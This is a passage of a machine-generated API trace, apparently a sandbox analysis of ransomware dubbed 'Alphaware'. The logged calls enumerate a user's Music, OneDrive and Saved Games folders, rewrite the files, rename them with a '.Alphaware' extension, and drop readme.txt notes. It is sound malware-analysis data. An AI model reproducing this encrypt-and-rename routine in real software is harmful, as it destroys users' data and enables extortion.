(normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\t-km3hlyo8hom.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf88f680, ftCreationTime.dwHighDateTime=0x1d96b6c, ftLastAccessTime.dwLowDateTime=0x96f2a030, ftLastAccessTime.dwHighDateTime=0x1d96e5c, ftLastWriteTime.dwLowDateTime=0x86d2c660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x97a0)) returned 1 [0088.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.285] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\t-km3HlYo8hOM.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\t-km3hlyo8hom.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\t-km3HlYo8hOM.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\t-km3hlyo8hom.wav.alphaware")) returned 1 [0088.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.293] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6580dbb0, ftCreationTime.dwHighDateTime=0x1d967dc, ftLastAccessTime.dwLowDateTime=0x86d2c660, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86d2c660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.293] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3b44430, ftCreationTime.dwHighDateTime=0x1d96f9f, ftLastAccessTime.dwLowDateTime=0x2efa3ad0, ftLastAccessTime.dwHighDateTime=0x1d97017, ftLastWriteTime.dwLowDateTime=0x86a58c40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x198b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="1tTeAH3Idl9j.m4a.Alphaware", cAlternateFileName="1TTEAH~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c2b50, ftCreationTime.dwHighDateTime=0x1d96e1e, ftLastAccessTime.dwLowDateTime=0x52b6eea0, ftLastAccessTime.dwHighDateTime=0x1d9716b, ftLastWriteTime.dwLowDateTime=0x86aa4f00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x17188, dwReserved0=0x0, dwReserved1=0x0, cFileName="6Osm8H3fx Y3KmcYQKDK.m4a.Alphaware", cAlternateFileName="6OSM8H~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f35a0a0, ftCreationTime.dwHighDateTime=0x1d96c48, ftLastAccessTime.dwLowDateTime=0xd857ebe0, ftLastAccessTime.dwHighDateTime=0x1d970c1, ftLastWriteTime.dwLowDateTime=0x86b17320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ce48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EbGhT40n22E7YA.mp3.Alphaware", cAlternateFileName="EBGHT4~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bd4ef0, ftCreationTime.dwHighDateTime=0x1d96e90, ftLastAccessTime.dwLowDateTime=0x4df044f0, ftLastAccessTime.dwHighDateTime=0x1d97212, ftLastWriteTime.dwLowDateTime=0x86b635e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14ef4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eRiABnWG9I.m4a.Alphaware", cAlternateFileName="ERIABN~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64c24e10, ftCreationTime.dwHighDateTime=0x1d96bf7, ftLastAccessTime.dwLowDateTime=0xf4824a80, ftLastAccessTime.dwHighDateTime=0x1d97059, ftLastWriteTime.dwLowDateTime=0x86baf8a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1dfb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jl GdXo.wav.Alphaware", cAlternateFileName="JLGDXO~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53886c00, ftCreationTime.dwHighDateTime=0x1d96d24, ftLastAccessTime.dwLowDateTime=0x2a8082c0, ftLastAccessTime.dwHighDateTime=0x1d96ec8, ftLastWriteTime.dwLowDateTime=0x86bd5a00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="kAkqA9OTk.m4a.Alphaware", cAlternateFileName="KAKQA9~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19b10df0, ftCreationTime.dwHighDateTime=0x1d972f8, ftLastAccessTime.dwLowDateTime=0x485a2640, ftLastAccessTime.dwHighDateTime=0x1d9747a, ftLastWriteTime.dwLowDateTime=0x86c21cc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xed34, dwReserved0=0x0, dwReserved1=0x0, cFileName="LIjGz_b-guf6pPz.wav.Alphaware", cAlternateFileName="LIJGZ_~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd19a0d0, ftCreationTime.dwHighDateTime=0x1d96e29, ftLastAccessTime.dwLowDateTime=0x8f96b840, ftLastAccessTime.dwHighDateTime=0x1d9753b, ftLastWriteTime.dwLowDateTime=0x86c940e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20a74, dwReserved0=0x0, dwReserved1=0x0, cFileName="pOajqkURwLncz.wav.Alphaware", cAlternateFileName="POAJQK~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86a58c40, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86a58c40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86a58c40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c543090, ftCreationTime.dwHighDateTime=0x1d96756, ftLastAccessTime.dwLowDateTime=0xf85dd470, ftLastAccessTime.dwHighDateTime=0x1d97000, ftLastWriteTime.dwLowDateTime=0x86ce03a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13074, dwReserved0=0x0, dwReserved1=0x0, cFileName="srAa yNa6Fae6hy.m4a.Alphaware", cAlternateFileName="SRAAYN~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf88f680, ftCreationTime.dwHighDateTime=0x1d96b6c, ftLastAccessTime.dwLowDateTime=0x96f2a030, ftLastAccessTime.dwHighDateTime=0x1d96e5c, ftLastWriteTime.dwLowDateTime=0x86d2c660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x97a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="t-km3HlYo8hOM.wav.Alphaware", cAlternateFileName="T-KM3H~1.ALP")) returned 1 [0088.294] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf88f680, ftCreationTime.dwHighDateTime=0x1d96b6c, ftLastAccessTime.dwLowDateTime=0x96f2a030, ftLastAccessTime.dwHighDateTime=0x1d96e5c, ftLastWriteTime.dwLowDateTime=0x86d2c660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x97a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="t-km3HlYo8hOM.wav.Alphaware", cAlternateFileName="T-KM3H~1.ALP")) returned 0 [0088.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.297] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.297] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0088.297] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.297] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini", dwFileAttributes=0x80) returned 1 [0088.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.298] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\onedrive\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x253b108 | out: lpFileInformation=0x253b108*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64)) returned 1 [0088.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.298] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\onedrive\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.298] ReadFile (in: hFile=0x254, lpBuffer=0x253b3a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x253b3a0*, lpNumberOfBytesRead=0x23eb38*=0x64, lpOverlapped=0x0) returned 1 [0088.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.316] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\onedrive\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\onedrive\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0x86d78920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x160)) returned 1 [0088.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.318] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\onedrive\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\onedrive\\desktop.ini.alphaware")) returned 1 [0088.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0088.319] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\onedrive\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0088.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.321] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0x86d78920, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86d78920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.321] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0x86d78920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0088.321] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86d78920, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86d78920, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86d78920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0088.321] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86d78920, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86d78920, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86d78920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0088.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.321] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.321] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0088.322] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.322] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini", dwFileAttributes=0x80) returned 1 [0088.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.322] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\saved games\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x25be730 | out: lpFileInformation=0x25be730*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0088.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.322] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\saved games\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.323] ReadFile (in: hFile=0x254, lpBuffer=0x25bea90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25bea90*, lpNumberOfBytesRead=0x23eb38*=0x11a, lpOverlapped=0x0) returned 1 [0088.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.344] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\saved games\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.346] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\saved games\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86dc4be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248)) returned 1 [0088.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.346] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\saved games\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\saved games\\desktop.ini.alphaware")) returned 1 [0088.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0088.347] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\saved games\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0088.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.348] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x86dc4be0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86dc4be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.348] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86dc4be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0088.348] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86dc4be0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86dc4be0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86dc4be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0088.349] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86dc4be0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86dc4be0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86dc4be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0088.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.349] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.349] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fe350, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0088.349] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, 